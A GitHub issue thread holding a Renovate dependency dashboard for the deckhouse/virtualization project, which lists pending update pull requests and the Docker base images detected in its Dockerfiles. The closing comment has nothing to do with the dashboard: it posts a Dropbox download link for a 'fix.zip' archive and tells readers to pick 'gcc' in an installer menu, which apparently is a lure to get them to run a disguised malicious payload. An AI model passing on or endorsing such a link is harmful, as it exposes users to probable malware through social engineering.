### ISSUE TITLE
Dependency Dashboard

### ISSUE THREAD

**Issue by alexey-igrychev** [deckhouse/virtualization#307]
This issue lists Renovate updates and detected dependencies. Read the [Dependency Dashboard](https://docs.renovatebot.com/key-concepts/dashboard/) docs to learn more.

## Rate-Limited

These updates are currently rate-limited. Click on a checkbox below to force their creation now.

 - [ ] chore(deps): update golang docker tag

## Open

These updates have all been created already. Click a checkbox below to force a retry/rebase of any.

 - [ ] [chore(deps): pin dependencies](../pull/305) (`alpine`, `busybox`, `caddy`, `debian`, `golang`)
 - [ ] [chore(deps): update golang:1.21.8-bookworm docker digest to 05a9064](../pull/325)
 - [ ] [chore(deps): update alpine docker tag to v3.20](../pull/306)
 - [ ] [chore(deps): update caddy docker tag to v2.8.4](../pull/326)
 - [ ] **Click on this checkbox to rebase all open PRs at once**

## Detected dependencies

<details><summary>dockerfile</summary>
<blockquote>

<details><summary>images/dvcr-artifact/build/importer.Dockerfile</summary>

 - `golang 1.21-bookworm`
 - `debian bookworm-slim`

</details>

<details><summary>images/dvcr-artifact/build/uploader.Dockerfile</summary>

 - `golang 1.21-bookworm`
 - `debian bookworm-slim`

</details>

<details><summary>images/kube-api-proxy/local/Dockerfile</summary>

 - `golang 1.21-alpine3.19`
 - `golang 1.21-alpine3.19`
 - `alpine 3.19`

</details>

<details><summary>images/virtualization-artifact/hack/dlv-controller.Dockerfile</summary>

 - `golang 1.21.8-bookworm@sha256:ac14cc827536ef1a124cd2f7a03178c3335c1db8ad3807e7fdd57f74096abfa0`
 - `busybox 1.36.1-musl`

</details>

<details><summary>images/virtualization-artifact/local/caddy/Dockerfile</summary>

 - `caddy 2.4.5`

</details>

<details><summary>images/virtualization-artifact/local/virtualization-controller/Dockerfile</summary>

 - `golang 1.20-alpine3.16`
 - `alpine 3.18`

</details>

<details><summary>images/vm-route-forge/dlv.Dockerfile</summary>

 - `golang 1.21.8-bookworm@sha256:ac14cc827536ef1a124cd2f7a03178c3335c1db8ad3807e7fdd57f74096abfa0`
 - `busybox undefined`

</details>

</blockquote>
</details>

<details><summary>regex</summary>
<blockquote>

<details><summary>werf.yaml</summary>

 - `python 3.9-slim`

</details>

</blockquote>
</details>

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
